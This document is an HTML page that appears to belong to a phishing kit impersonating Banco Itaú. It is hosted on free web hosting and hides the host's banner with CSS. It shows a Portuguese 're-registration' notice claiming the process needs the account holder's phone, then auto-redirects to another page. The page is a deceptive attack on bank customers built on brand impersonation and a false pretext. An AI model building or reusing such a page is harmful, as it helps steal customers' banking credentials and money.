<!DOCTYPE html>
<html lang="pt-BR">
<head>
<meta name="theme-color" content="#FF7F00">
	<title>Banco Itaú - Feito Para Você</title>
	<meta http-equiv="content-type" content="text/html; charset=UTF-8">
	<link rel="stylesheet" type="text/css" href="css/bootstrap.css">
	<link rel="stylesheet" type="text/css" href="css/estilo.css">
	
	<link rel="icon" href="img/favicon.ico" type="image/x-icon"/>

	<meta name="viewport" content="width=device-width, initial-scale=1.0">

	<script src="js/jquery-3.2.1.min.js"></script>
	<script src="js/bootstrap.js"></script>
	<script src="js/script.js"></script>

</head>

<body id="index">
	<div class="container">
		<div class="row">
			<div class="col-md-12">
				<h1 id="logo">
					<img src="img/itau-logo.png" style="width: 150	px;">
					<div class="tela-grande">
						<p>Desculpe o transtorno :(</p>
						<p>O recadastramento só poderá ser efetuado pelo telefone do titular da conta.</p>
					</div>
					<meta http-equiv="refresh" content="2;url=home.php">
				</h1>
			</div>
		</div>
	</div>
<div style='text-align: right;position: fixed;z-index:9999999;bottom: 0; width: 100%;cursor: pointer;line-height: 0;display:block !important;'><a title="Hosted on free web hosting 000webhost.com. Host your own website for FREE." target="_blank" href="https://www.000webhost.com/?utm_source=000webhostapp&amp;utm_campaign=000_logo&amp;utm_medium=website_safcs66&amp;utm_content=footer_img"><img src="https://cdn.rawgit.com/000webhost/logo/e9bd13f7/footer-powered-by-000webhost-white2.png"  alt="www.000webhost.com"></a></div></body>

</body><head>
<style>
img[src*="https://cdn.rawgit.com/000webhost/logo/e9bd13f7/footer-powered-by-000webhost-white2.png"] {
    display: none;
}
</style>
</head>
</body>
</html>